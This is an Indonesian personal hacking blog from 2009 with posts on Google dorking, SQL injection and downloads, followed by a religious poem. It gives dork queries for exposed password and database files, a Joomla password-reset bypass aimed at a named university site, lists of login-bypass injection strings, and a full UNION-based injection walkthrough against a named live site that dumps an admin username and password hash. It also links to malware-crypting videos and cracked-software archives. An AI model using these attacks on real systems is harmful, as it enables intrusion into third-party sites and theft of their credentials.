bh4nned system™

Google dork sebagai senjata hacking

2009-08-14T04:23:00.000-07:00

Banyak pencarian yang kita inginkan pada search engines tidak seperti yang diharapkan, mengapa? karena keyword yang anda masukan kurang sesuai dengan keyword-keyword yang tersimpan di mesin search engines.

Sehingga untuk mempermudahnya Google menyediakan fasilitas-fasilitas (dork), untuk mempermudahkan suatu pencarian, bahkan kita juga dapat melakukan hacking (melihat password) account orang lain yang terindex oleh google.

Pengenalan tentang google dorks :
Type-type dalam penggunaannya ada beberapa macam diantaranya:

intitle
allintitle

(Mencari judul/title pada suatu web)

inurl
allinurl

(Mencari suatu string yang terdapat pada url)

filetype

(Mencari suatu file secara lebih spesifik)
(www.google.c.id/help/faq_filetypes.html)

allintext

(Mencari suatu nilai string dalam suatu web)

site

(Mencari pada web tertentu)

link

(Mencari web2 yang mempunyai link pada web yang di pilih)

contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan sja di google seperti ini
intitle:"index of/avenged"
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), llu ketikan kata aveng*d agar google mencari database file tentg kata-kata aveng*d

Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini
intitle:"index of" "skripsi" site:.ac.id
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id

dan ini contoh2 lain dalam penggunaan google dork
inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:id filetype:.doc

sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confirm
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user

ketikan di google >>>>> inurl:"option=com_user"
dan akan terlihat hasilnya, kita ambil contoh pada web indonesia saja,

http://www.lbifib.ui.ac.id/index.php?option=com_user&view=login

lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi

http://www.lbifib.ui.ac.id/index.php?option=com_user&view=reset&layout=confirm

lalu ketikan token '
dan apa hasilnya, password sudah bisa kita reset ulang,,,,

sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.

TUTORIAL HACKING

2009-08-14T02:56:00.000-07:00

Tutorial Hacking

Berikut adalah kumpulan video hacker yang bisa didownload lengkap dengan banyak tutorialnya. Langsung download aja

1. DeluxeBB 1.06 Exploit (9mb)
Remote SQL Injection Exploit

Code:

http://rapidshare.com/files/11156227/100_live585.rar

2. NetBios Live Hack (5mb)
Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)

Code:

3. Classified (7mb)
Shows how site classified is Hacked.

Code:

http://rapidshare.com/files/11158779/102_site585.rar

4. NASA (2mb)
NASA Department website Hacked.

Code:

http://rapidshare.com/files/11158865/92_meh.zip

5. Linux Network Monitor (5mb)
This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.

Code:

http://rapidshare.com/files/11158774/95_CBT4Free-Linux_Network_Monitor.zip

6. Linux DNS Server (11mb)
This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship. This video is specifically tailored to setting up DNS for a web server.

Code:

7. Windows Web Server (6mb)
This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro.

Code:

http://rapidshare.com/files/11158787/98_Windows_Web_Server.zip

8. Win Server 2003 IIS and DNS (4mb)
This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server.

Code:

http://rapidshare.com/files/11158780/99_Windows_Server_2003_IIS_and_DNS.zip

9. Hacker Defender Movie (8mb)
Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more.

Code:

http://rapidshare.com/files/11158766

/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar

10. 0-DAY Simple SQL Injection (8mb)
A film project about a cracker with the name zer0day. (Hacking with Linux -php)

Code:

http://rapidshare.com/files/11158799/89_simple-sql-injection.zip

11. wbb (10mb)
wbb portal hacked by XSS.

Code:

http://rapidshare.com/files/11158816/82_wbb_portal.rar

12. Reverse Engineering (20mb)
Reverse Engineering with LD PRELOAD

Code:

http://rapidshare.com/files/11158857/83_reverse.rar

13. SWF File Vulnerability
Multiple Websites Embedded SWF File Vulnerability Demonstration

Code:

http://rapidshare.com/files/11158813/84_SWF_Vul_Demo.rar

14. IPB 1.3 SQL (10mb)
Invasion Power Board 1.3 SQL Injection Exploit

Code:

http://rapidshare.com/files/11158768/86_IPB_SQL.rar

15. Qnix Buffer Overflows (11mb)
Qnix Demonstrating Exploration of Simple Buffer Overflows

Code:

http://rapidshare.com/files/11158770/87_buff.rar

16. ASP SQL (5mb)
Simple ASP Administrator SQL Injection (5mb)

Code:

http://rapidshare.com/files/11158795/88_asp_sql.rar

17. Blind MySQL (9mb)
Demonstration of Blind MySQL Injection (bsqlbf)

Code:

http://rapidshare.com/files/11158804/77_Blind_MySQL.rar

18. D-Link Wireless (3mb)
Intruders D-Link Wireless Access Point Configuration Disclosure

Code:

http://rapidshare.com/files/11158777/78_D-Link_Wireless.rar

19. Mysql bftools (8mb)
Demonstration of Blind MySQL Injection (mysql_bftools)

Code:

http://rapidshare.com/files/11158798/79_mysql_bftools.rar

20. PHP Remote File (9mb)
PHP Remote File Inclusion Windows Backdoor.

Code:

http://rapidshare.com/files/11158805/80_PHP_Remote.rar

21. Cracking WEP in 10 Minutes (30mb)
A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You'll think twice about WEP after this

Code:

http://rapidshare.com/files/11158904/75_see-sec-wepcrack.zip

22. Tunneling Exploits via SSH (18mb)
An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.

Code:

http://rapidshare.com/files/11158855/74_see-sec-ssh-dcom-tunneling.zip

23. A classic client side attack (18mb)
The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.

Code:

http://rapidshare.com/files/11158860/76_see-sec-client-side.rar

24. C++ Video tutorials (29mb)
Nice C/C++ Shockwave videos.

Code:

http://rapidshare.com/files/11158892/70_C__.rar

25. Interview with Kevin Mitnick (12mb)
He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.

Code:

http://rapidshare.com/files/11158829/68_kevin.rar

26. Unix Shell Fundamentals (40mb)
VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.

Code:

http://rapidshare.com/files/11158906/69_UnixShellFund.rar

27. Microsoft.com Bugs
Nice videos shows of old bug that was exploited on the site.

Code:

28. Bitfrost Server Crypting (15mb)
This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt.

Code:

http://rapidshare.com/files/11164849/66_Bifrost_Server_Cryp.rar

38. Metasploit Flash Tutorial
This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do.

Code:

http://rapidshare.com/files/11164788/48_metasploit1.swf

29. Using VirtualDub and a cheap webcam as a camcorder (10mb)
I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.

Code:

http://rapidshare.com/files/11164832/49_cheapcamcorder.avi

DASAR-DASAR SQL INJECTION

2009-08-13T00:00:00.001-07:00

Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan
kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.

Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya .
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :

Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .

Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection.
Semoga artikel ini berguna .

VIP Owned

2009-07-31T04:42:00.000-07:00

10.000 Full programs + Cracks
ftp://ftp.freenet.de/pub/filepilot/windows/

Game
ftp://207.71.8.54:21/games/

Mixed apps dan utilities, macromedia, Ad@be, multimedia, NAV
ftp://159.226.119.20:21/pub/windows/

mp3's, radio
ftp://193.43.36.131/Radio/MP3/
ftp://193.125.152.110:21/pub/.1/misc...urray/assorted

SolarisTM 7 Intel Platform Edition speed:15kbps
ftp://195.34.232.146:21/pub/unix/Solaris/sol7x86/

MS_Visual_C++_1_52c
ftp://212.85.106.113:21/

ANTI VIRUS
ftp://89.162.150.194/Software/Antivirus/

SOFTWARE
ftp://89.162.150.194/Software/

Moga² aja ini bisa bermanfaat .. site dump buat temen² ^^

SQL INJECTION - VIDEO

2009-07-30T08:19:00.000-07:00

SQL INJECTION + VIDEO
- SQL Injection --

----> 1
pertama kita tetapkan target terlebih dahulu

target ----> http://www.allaboutcar.net/

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.

http://www.allaboutcar.net/articles.php?topic=-3'

---->>> 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:

http://www.allaboutcar.net/articles.php?topic=-3 order by 1--
http://www.allaboutcar.net/articles.php?topic=-3 order by 2--
http://www.allaboutcar.net/articles.php?topic=-3 order by 3--
http://www.allaboutcar.net/articles.php?topic=-3 order by 4--
http://www.allaboutcar.net/articles.php?topic=-3 order by 5--
sehingga muncul error atau hilang pesan error...

--------> 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union

contoh

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

kolom 2
go to kolom 2

Hal yang perlu kita periksa db versi 5 nya .. jika kita continu ..
jika itsversion 4 .. Anda harus menebak tabel dan kolom

untuk memeriksa versi db menggunakan perintah ini
"@@version" atau "version()"

versinya adalah
5.0.67

Untuk menampilkan semua isi dari table tsb adalah menggunakan perintah ini

code

http://www.allaboutcar.net/articles.php?topic=-3 union select
1,group_concat(table_name),3,4,5 from information_schema.tables where
table_schema=database()--

[code]

http://www.allaboutcar.net/articles.php?topic=-3 union select
1,group_concat(table_name),3,4,5 from information_schema.tables where
table_schema=database()--

akan muncul seperti ini

admins,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,forum_c,gbook,infopages,jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,users

ok lets get kolom sekarang .. untuk melakukan itu hanya mengganti ini

[code]

http://www.allaboutcar.net/articles.php?topic=-3 union select
1,group_concat(table_name),3,4,5 from information_schema.table where
table_schema=database()--

to
[code]

http://www.allaboutcar.net/articles.php?topic=-3%20union%20select%201,group_concat(column_name),3,4,5%20from%20information_schema.columns%20where%20table_schema=database()--

[code]

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,topic,author,id,ip,date,id,title,alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,what,date,wid,name,mail,title,text,ip,id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,t

untuk kolom nama data dari tabel admin

[code]

http://www.allaboutcar.net/articles.php?topic=-3%20union%20select%201,group_concat(id,0x3a,nick,0x3a,pass),3,4,5%20from%20admins--

dan user sama paswordnya adalah

user : MaTySeK
Pas Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253

Crack : 9dc1fc60fcd6bb1a10b9d97e64cdc253

Untuk Lebih jelaas
Download Videonya
http://www.4shared.com/get/112223635/e2dc239f/SQL_Injections_V506.html

mutar videonya pake Camtasia Click to Download

================================================

Tutorial SQL Injections

2009-07-30T07:04:00.000-07:00

Tutorial SQL Injections (hack websites)

Step 1

kurang jelas bisa langsung
http://i727.photobucket.com/albums/ww273/koontol/1.png

Step 2

http://i727.photobucket.com/albums/ww273/koontol/2-2.png

Step 3

http://i727.photobucket.com/albums/ww27 … ol/3-1.png

Step 4

http://i727.photobucket.com/albums/ww273/koontol/4-1.png

Step 5

http://i727.photobucket.com/albums/ww273/koontol/5-1.png

Step 6

http://i727.photobucket.com/albums/ww27 … ol/6-1.png

Step 7

http://i727.photobucket.com/albums/ww27 … /7-1-1.png

Step 8

http://i727.photobucket.com/albums/ww273/koontol/8-1.png

Step terakhir

http://i727.photobucket.com/albums/ww273/koontol/11.png

Cradit Alex Owners

Welcome to My Site

2009-07-29T08:44:00.000-07:00

Terimakasih anda telah berkunjung ke halaman situs saya.. semoga situs ini dapat bermanfaat bagi anda, saya juga sangat berharap semoga kita sama² bersharing pengalaman dsni,walaupun situs ini hanya sebuah situs pribadi dan sebuah coretan kecil dari saya.. alangkah indah nya jika kita dapat sama² bersharing pengalaman dan pengetahuan disitus kecil saya ini.dengan harapan kita bersama² menjalinkan tali silahturrahmi sesama cyber diseluruh Indonesia. Semoga situs ini berguna bagi semua pengunjung.dan terima kasih juga kepada rekan² cyber semua yang telah mengisi shoutbox di blog ini..

Bila Al Qur'an bisa bicara

2009-07-29T05:58:00.000-07:00

|| Bila Al Qur'an bisa bicara !||

Waktu engkau masih kanak-kanak, kau laksana kawan sejatiku
Dengan wudu' aku kau sentuh dalam keadaan suci
Aku kau pegang, kau junjung dan kau pelajari
Aku engkau baca dengan suara lirih ataupun keras setiap hari
Setelah usai engkaupun selalu menciumku mesra...

Sekarang engkau telah dewasa...
Nampaknya kau sudah tak berminat lagi padaku...
Apakah aku bacaan usang yang tinggal sejarah...
Menurutmu barangkali aku bacaan yang tidak menambah pengetahuanmu
Atau menurutmu aku hanya untuk anak kecil yang belajar mengaji saja?

Sekarang aku engkau simpan rapi sekali hingga kadang engkau lupa dimana menyimpannya
Aku sudah engkau anggap hanya sebagai perhiasan rumahmu
Kadang kala aku dijadikan mas kawin agar engkau dianggap bertaqwa
Atau aku kau buat penangkal untuk menakuti hantu dan syetan
Kini aku lebih banyak tersingkir, dibiarkan dalam kesendirian dalam kesepian
Di atas lemari, di dalam laci, aku engkau pendamkan

Dulu...pagi-pagi...surah-surah yang ada padaku engkau baca beberapa halaman
Sore harinya aku kau baca beramai-ramai bersama temanmu di surau.....
Sekarang... pagi-pagi sambil minum kopi...engkau baca Koran pagi atau nonton berita TV
Waktu senggang..engkau sempatkan membaca buku karangan manusia
Sedangkan aku yang berisi ayat-ayat yang datang dari Allah Yang Maha Perkasa
Engkau campakkan, engkau abaikan dan engkau lupakan...

Waktu berangkat kerjapun kadang engkau lupa baca pembuka surah2ku (Basmalah)
Diperjalanan engkau lebih asyik menikmati musik duniawi
Tidak ada kaset yang berisi ayat Allah yang terdapat padaku di laci mobilmu
Sepanjang perjalanan radiomu selalu tertuju ke stasiun radio favoritmu
Aku tahu kalau itu bukan Stasiun Radio yang senantiasa melantunkan ayatku

Di meja kerjamu tidak ada aku untuk kau baca sebelum kau mulai kerja
Di Komputermu pun kau putar musik favoritmu
Jarang sekali engkau putar ayat-ayatku melantun
E-mail temanmu yang ada ayat-ayatkupun kadang kau abaikan
Engkau terlalu sibuk dengan urusan duniamu
Benarlah dugaanku bahwa engkau kini sudah benar-benar melupakanku

Bila malam tiba engkau tahan nongkrong berjam-jam di depan TV
Menonton pertandingan Liga Italia , musik atau Film dan Sinetron laga
Di depan komputer berjam-jam engkau betah duduk
Hanya sekedar membaca berita murahan dan gambar sampah

Waktupun cepat berlalu...aku menjadi semakin kusam dalam lemari
Mengumpul debu dilapisi abu dan mungkin dimakan kutu
Seingatku hanya awal Ramadhan engkau membacaku kembali
Itupun hanya beberapa lembar dariku
Dengan suara dan lafadz yang tidak semerdu dulu
Engkaupun kini terbata-bata dan kurang lancar lagi setiap membacaku

Apakah Koran, TV, radio , komputer, dapat memberimu pertolongan?
Bila engkau di kubur sendirian menunggu sampai kiamat tiba
Engkau akan diperiksa oleh para malaikat suruhanNya
Hanya dengan ayat-ayat Allah yang ada padaku engkau dapat selamat melaluinya

Sekarang engkau begitu enteng membuang waktumu...
Setiap saat berlalu...kuranglah jatah umurmu...
Dan akhirnya kubur sentiasa menunggu kedatanganmu..
Engkau bisa kembali kepada Tuhanmu sewaktu-waktu
Apabila malaikat maut mengetuk pintu rumahmu.

Bila aku engkau baca selalu dan engkau hayati...
Di kuburmu nanti....
Aku akan datang sebagai pemuda gagah nan tampan
Yang akan membantu engkau membela diri
Bukan koran yang engkau baca yang akan membantumu
Dari perjalanan di alam akhirat
Tapi Akulah "Qur'an" kitab sucimu
Yang senantiasa setia menemani dan melindungimu

Peganglah aku lagi . .. bacalah kembali aku setiap hari
Karena ayat-ayat yang ada padaku adalah ayat suci
Yang berasal dari Allah, Tuhan Yang Maha Mengetahui
Yang disampaikan oleh Jibril kepada Muhammad Rasulullah SAW

Keluarkanlah segera aku dari lemari atau lacimu...
Jangan lupa bawa kaset yang ada ayatku dalam laci mobilmu
Letakkan aku selalu di depan meja kerjamu
Agar engkau senantiasa mengingat Tuhanmu

Sentuhilah aku kembali...
Baca dan pelajari lagi aku....
Setiap datangnya pagi dan sore hari
Seperti dulu....dulu sekali...
Waktu engkau masih kecil , lugu dan polos...
Di surau kecil kampungmu yang damai...

Jangan aku engkau biarkan sendiri....
Dalam bisu dan sepi....

Mahabenar Allah, yang Mahaperkasa lagi Mahabijaksana